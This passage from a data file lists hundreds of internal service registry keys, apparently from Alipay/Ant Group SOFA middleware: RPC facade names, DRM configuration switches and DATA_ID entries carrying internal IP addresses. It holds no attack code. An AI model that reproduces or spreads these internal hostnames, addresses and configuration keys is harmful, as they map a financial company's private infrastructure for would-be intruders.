DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.236.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.134.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthcore.common.service.facade.api.statistics.GiftUserStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.96.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_CHARGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:taAsyncExecExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.vcontract.api.MVouchContractManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_GIFT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCompanyManager.tairCacheEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mrchprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_GUARANTEE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAmountAdjustCallback1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.write.UserReferenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipayplus.mobile.component.common.facade.f2fpay.F2fPayInvalidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.service.service.TemplateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.sendSignDataMsgToFinsign,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.monitor.AlertRecordManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_2112#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.crab.protocol.tr.TrCrabService:1.0:antiep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mindv_survey_approve@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceDrugUserPrescriptionApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimdecision.common.service.InsDecisionManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.datacontextlib.service.facade.limitcum.CumulateQueryFacade:1.0:zdataquery-adapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.service.config.MobileCodecConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.failover.component.service.facade.FailoverFacade:1.0:vouchercore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.config.AutoRecommendPlanFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_RestrictAccAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:fundapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetTransLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:env-app-config@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_1201_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.zmxy.zmclifeprod.common.service.facade.api.LisaTodoListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.artisan.facade.component.ComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.authcenter.service.facade.QRCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_ASSET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.mybank.bkassetmore.common.service.facade.api.NotifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.gfas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.regionSupportTntantConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pfunddts.common.facade.api.rome.RomeBizPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_FP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instopen.service.facade.document.BackDocQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.icooperation.api.InsAlipayUidBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.sns.api.SnsApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.FundBankTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antb_processCallback_antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rest.restful.LabelServiceRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.personalprod.service.facade.mc.McFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.128.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.isOpenWFinFundPurchase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.voucher.VcpChangeCodeManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.rewardWriteUserList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.antschedulerconsole.endpoint.facade.ITimeZoneRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.paramTaskDC,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniappexam.facade.api.MiniAppTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.api.fundcoacher.FundCoacherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZPUBLISHUIWEB#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.Arch:name=com.alipay.xts.ElasticSwitcher.elasticRule,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.choosedschedule.UserSchedulePlanQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteye.data.PrivacySecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.ServiceOperateLogDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.mutliagent.MiniMultiAgentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebBankCardRedeemQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.view.ComponentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthzerotrialtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileappcommon.common.service.facade.openapi.metadata.MetadataOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reservecenter.facade.api.AccountDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocontent.common.service.facade.api.hzf.build.PageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.admin.ForumAdminFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.relation.api.RelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:testT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.argo.service.facade.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fundselling.facade.purchase.TransactionDateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.AppSubscribeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_commonQueryAndPushScriptProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1201#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kgmng.common.service.facade.ruleinference.OnlineServiceRuleInferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.FundAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.biz.shared.AsyncCommTestCaseExecManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfcenter.common.service.facade.ArBillWriteoffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.task.MsgTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianQueueMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointprod.commom.manage.facade.merchant.api.MerchantBatchQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.enums.EnumFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.clause.InvestSummaryClauseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.jiaofei.CommunityExternalBillInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.InstConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.AppUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.sendMessageProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abilitycore.common.service.facade.std.AbilityConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPQueryService:1.0:mrchishub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmodelcore.facade.api.FinmodelCoreModelExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.InfoExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.facade.notify.ApiNotifyRuleManageFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.adexCreativeSceneConf,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbshopdecorate.common.service.facade.kbserv.decorate.DecorateBizOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:definpfprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.scene.AgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zerox.common.service.facade.keyword.AbnormalKeywordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.open.api.risk.RMChangeEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.octopus.core.facade.InvokeFacade:1.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.rpc.facade.ChangeCodeBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradecore:name=com.alipay.tradecore.service.zoneclient.impl.TradeCreateElasticDRM.productWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.205.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_instGrayOpenCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.app.AppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imnotify.api.client.NotifyClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insiop.common.service.facade.analysis.InsIopGridAnalysisMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.feature.FeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.InsuranceCoverageEndorsementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:stockvirtual@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finbatch.finbatchObDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.177.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.alplan.service.facade.FinancePlanCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITSCENEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue19#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:amlcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imatchfacade.common.service.facade.delivery.CampaignApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_BKTOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.heralib.service.facade.api.ComputeQueryServiceFacade:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ufe.common.service.TableInsMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.SearchRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.KeyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ck:name=com.alipay.zdal.config.dynamic.pcardsales.pcardSettleDataSourceNew.doublewrite.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:assetFluxAdviceServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.msg.PublicBroadMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.180.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.simulated.api.SatransDailyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharityprod.common.service.facade.PersonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifprocess:name=com.alipay.cifprocess.drm.CIFINAgentSwitcher.publishInterval,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbbocenter.common.service.facade.order.pay.PayNotifyListenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.common.service.facade.api.PPayPaymentConsultFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.velocity.VelocityRepositoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:promoplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.common.IFundModelFacade:1.0:refundOrderFundModel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.OperateLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:insxhbclaimprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.questionnaire.QuestionnairePermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageBusinessDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.landingPagePrex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ebppgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.service.facade.loan.api.ArrangementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.33.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aistudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkstmtcore.common.service.facade.customer.tradestmt.CustTradeBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataservice.common.service.facade.PaymentRefundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.deliver.DeliverProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.drm.Drm4DispatchTask.monitorRetryValid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobile.appng.common.spi.AppngHttpRequestService:1.0:mobile-global-saas-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.OssFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.suiteide.common.service.facade.api.ComponentTemplateRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.inspection.api.PcTaskRuleInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpaybizcore.common.facade.plan.api.PlanModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.pyxis.facade.BizdefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.LisaProductServiceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.94.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.myMenuConfigJsonArray,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdCardMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityTechPointDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_ZC_TR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestprod.core.service.facade.OdpsTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ismmlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.util.EnumQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.SmartgisService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.211.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_WF_ANT_VIP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ACLINKECORE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequery.common.service.facade.TradeModelQueryFacade:1.0:tradequeryprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.financing.facade.api.FinancingFinGainService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PlacardActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tbx.common.service.facade.service.datapool.DataSourceInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.oa.bpms.integration.BpmsIntegrationService:1.0:dpoa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.meta.facade.service.PublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.PortfolioCustomizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.solution.ProductSolutionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publicexprod.common.service.facade.OfficialAccountRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intopermanager.common.service.facade.api.monitor.MonitorResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksupplychainprod.common.service.facade.account.api.BankRoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.HealthMerchantResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_lifemock_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:staffSocialInsuranceDownloadCenterCallBackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotonemng.common.service.api.MsgboxMktBannerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:receivableCRCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.consult.OrgDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.224.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:render#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkmerchanttrade.common.service.facade.api.PayOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.manage.facade.BudgetLibAlertConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowCoreFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openco